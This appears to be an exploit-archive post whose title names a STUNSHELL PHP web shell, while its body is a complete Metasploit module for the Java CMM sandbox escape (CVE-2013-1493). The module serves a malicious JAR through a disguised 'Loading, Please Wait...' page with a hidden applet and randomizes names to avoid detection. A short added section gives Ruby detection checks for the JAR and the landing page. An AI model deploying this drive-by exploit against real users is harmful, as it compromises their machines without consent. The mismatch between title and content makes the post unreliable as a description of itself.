STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # The precompiled applet classes ship with the framework; only Init's name is randomized.
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Serve the payload JAR with the applet classes added to it.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the framework's own markers inside the JAR entries.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Landing page: embed the applet that will request the JAR above.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
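From the defender's side, the module above randomizes the Init class name and the "metasploit"/"Payload" strings, but the Leak.class, MyBufferedImage.class and MyColorSpace.class entries keep their fixed names and the landing page always embeds a 1x1 applet pointing at an 8-letter random .jar. The following is an added example (not part of the original post or of the Metasploit Framework) that reads a JAR's central directory to look for that fixed combination and checks a page for the applet tag shape; the JAR writer and the sample names (xQzPa, kRtYuPqa) are constructed for the demonstration.

```ruby
require 'zlib'
# Entry names this module leaves fixed: it randomizes the Init class and the
# "metasploit"/"Payload" strings, but not these three helper classes.
CMM_MARKER_ENTRIES = %w[Leak.class MyBufferedImage.class MyColorSpace.class].freeze

# List entry names from the ZIP central directory (the index the JVM itself
# reads), so compression method and data descriptors do not matter.
def jar_entry_names(jar)
  bytes = jar.b
  eocd = bytes.rindex("PK\x05\x06".b)
  return [] unless eocd
  pos = bytes.byteslice(eocd + 16, 4).unpack1('V') # central directory offset
  names = []
  while bytes.byteslice(pos, 4) == "PK\x01\x02".b
    name_len, extra_len, comment_len = bytes.byteslice(pos + 28, 6).unpack('vvv')
    names << bytes.byteslice(pos + 46, name_len).force_encoding('UTF-8')
    pos += 46 + name_len + extra_len + comment_len
  end
  names
end

# True when every fixed helper class of this module is present in the JAR.
def cmm_jar?(jar)
  names = jar_entry_names(jar)
  CMM_MARKER_ENTRIES.all? { |n| names.include?(n) }
end

# The landing page embeds a 1x1 applet whose archive is an 8-letter random name.
def cmm_landing_page?(html)
  !!(html =~ /<applet\b[^>]*archive="[a-z]{8}\.jar"[^>]*width="1"[^>]*height="1"/i)
end
# Constructed sample data: a minimal JAR writer (stored entries plus a central
# directory) so the checks above can run offline without a real archive.
def build_stored_jar(entries)
  local, central = ''.b, ''.b
  entries.each do |name, data|
    crc = Zlib.crc32(data)
    central << ["PK\x01\x02", 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
                name.bytesize, 0, 0, 0, 0, 0, local.bytesize].pack('a4vvvvvvVVVvvvvvVV') << name
    local << ["PK\x03\x04", 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
              name.bytesize, 0].pack('a4vvvvvVVVvv') << name << data
  end
  local + central + ["PK\x05\x06", 0, 0, entries.size, entries.size,
                     central.bytesize, local.bytesize, 0].pack('a4vvvvVVv')
end
CLASS_STUB = [0xCA, 0xFE, 0xBA, 0xBE].pack('C*') # class-file magic only, constructed
SAMPLE_JAR = build_stored_jar([['META-INF/MANIFEST.MF', "Manifest-Version: 1.0\n".b],
  ['xQzPa.class', CLASS_STUB], ['Leak.class', CLASS_STUB], # xQzPa stands in for Init
  ['MyBufferedImage.class', CLASS_STUB], ['MyColorSpace.class', CLASS_STUB]])
SAMPLE_HTML = %Q|<applet archive="kRtYuPqa.jar" code="xQzPa.class" width="1" height="1">|
```

Feeding a JAR captured from a web proxy to cmm_jar? gives the same answer regardless of how its entries were compressed, because only the central directory is read.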